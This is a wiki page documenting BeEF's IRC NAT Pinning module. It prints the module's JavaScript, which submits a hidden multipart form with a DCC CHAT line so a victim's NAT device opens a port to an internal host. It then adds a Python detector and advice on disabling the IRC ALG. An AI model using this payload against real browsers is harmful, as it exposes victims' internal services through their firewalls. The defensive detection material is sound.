# Module: IRC NAT Pinning (h4sh5/beef GitHub Wiki)
## Summary

- Objective: Use the IRC protocol to open a port behind NAT devices
- Authors: Bart Leppens
- Browsers: Firefox
## Internal Working

The firewall/NAT device must support IRC connection tracking (an IRC ALG that parses DCC requests and opens the port they advertise). BeEF automatically binds a socket on port 6667 (IRC). Then you can connect to the victim's public IP on that port.
```javascript
var myIframe = beef.dom.createInvisibleIframe();
var myForm = document.createElement("form");
// connectto, privateip and privateport are the module's parameters (not shown here)
var action = "http://" + connectto + ":6667/";
myForm.setAttribute("name", "data");
myForm.setAttribute("method", "post");
// it must be multipart/form-data so the message appears on a separate line
myForm.setAttribute("enctype", "multipart/form-data");
myForm.setAttribute("action", action);
// create message, refer Samy Kamkar (http://samy.pl/natpin/)
// DCC CHAT carries the IP as a decimal integer; dot2dec() is the module's dotted-quad-to-decimal helper
var x = String.fromCharCode(1);  // CTCP delimiter (0x01)
var s = 'PRIVMSG beef :' + x + 'DCC CHAT beef ' + dot2dec(privateip) + ' ' + privateport + x + "\n";
```
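The DCC CHAT line above is exactly what a NAT device's IRC helper parses, and the helper cannot tell a browser-submitted form body from a real client's request. As an added example (not code from the BeEF module or this wiki), the following Python detector takes the defender's side: it inspects the client-to-server bytes of a TCP/6667 connection, decodes the DCC target back from decimal to dotted quad, and flags the stream when the DCC request is carried inside an HTTP request body, which is how a form POST looks and how a genuine IRC session never opens. The helper names `dec2dot` and `find_nat_pinning` and both sample payloads are constructed for this example.

```python
import ipaddress
import re
from typing import Optional

# Matches the CTCP-framed DCC CHAT request an IRC ALG looks for:
#   \x01DCC CHAT <nick> <ip-as-decimal> <port>\x01
DCC_CHAT_RE = re.compile(rb"\x01DCC CHAT (\S+) (\d{1,10}) (\d{1,5})\x01")

# Request lines a browser form submission can begin with; a real IRC client
# session never starts this way (it sends NICK/USER/PASS first).
HTTP_METHODS = (b"POST ", b"GET ", b"PUT ")


def dec2dot(n: int) -> str:
    """Convert the decimal IPv4 form used by DCC back to dotted quad."""
    return str(ipaddress.IPv4Address(n))


def find_nat_pinning(stream: bytes) -> Optional[dict]:
    """Inspect the client-to-server bytes of a connection to TCP/6667.

    Returns None when no DCC CHAT request is present. Otherwise returns the
    decoded target and marks the stream suspicious when the DCC request sits
    inside an HTTP request (the NAT-pinning pattern) instead of an IRC session.
    """
    m = DCC_CHAT_RE.search(stream)
    if m is None:
        return None
    ip = ipaddress.IPv4Address(int(m.group(2)))
    port = int(m.group(3))
    http_framed = stream.startswith(HTTP_METHODS)
    # The header block is everything before the first blank line.
    headers = stream.split(b"\r\n\r\n", 1)[0]
    multipart = b"multipart/form-data" in headers
    return {
        "nick": m.group(1).decode("ascii", "replace"),
        "target_ip": str(ip),
        "target_port": port,
        "target_is_private": ip.is_private,
        "http_framed": http_framed,
        "multipart_body": multipart,
        # Pinning requires the DCC line to arrive inside a browser-sent HTTP body.
        "suspicious": http_framed,
    }


# Constructed sample 1: what the module's form POST looks like on the wire.
# 3232235876 is the decimal form of 192.168.1.100 (constructed values).
PINNING_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 203.0.113.10:6667\r\n"
    b"Content-Type: multipart/form-data; boundary=----ExampleBoundary\r\n"
    b"Content-Length: 120\r\n"
    b"\r\n"
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="msg"\r\n'
    b"\r\n"
    b"PRIVMSG beef :\x01DCC CHAT beef 3232235876 8080\x01\n"
    b"\r\n"
    b"------ExampleBoundary--\r\n"
)

# Constructed sample 2: a legitimate IRC client issuing the same DCC request.
LEGIT_IRC = (
    b"NICK alice\r\n"
    b"USER alice 0 * :Alice\r\n"
    b"PRIVMSG bob :\x01DCC CHAT chat 3232235876 5000\x01\r\n"
)


if __name__ == "__main__":
    for name, sample in (("pinning_post", PINNING_POST), ("legit_irc", LEGIT_IRC)):
        print(name, find_nat_pinning(sample))
```

Detection of this kind is a stopgap: the durable mitigation is to disable the IRC ALG on the NAT device (on Linux-based routers, not loading the `nf_conntrack_irc` helper, or attaching it only to flows that are genuinely IRC), because the device otherwise has no way to distinguish a form body a browser was tricked into sending from a DCC request the user meant to make.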
## References

- Opening closed ports on NAT device and bypassing stateful firewalls with BeEF, BeEF blog
- NAT Pinning: Penetrating routers and firewalls from a web page
- Video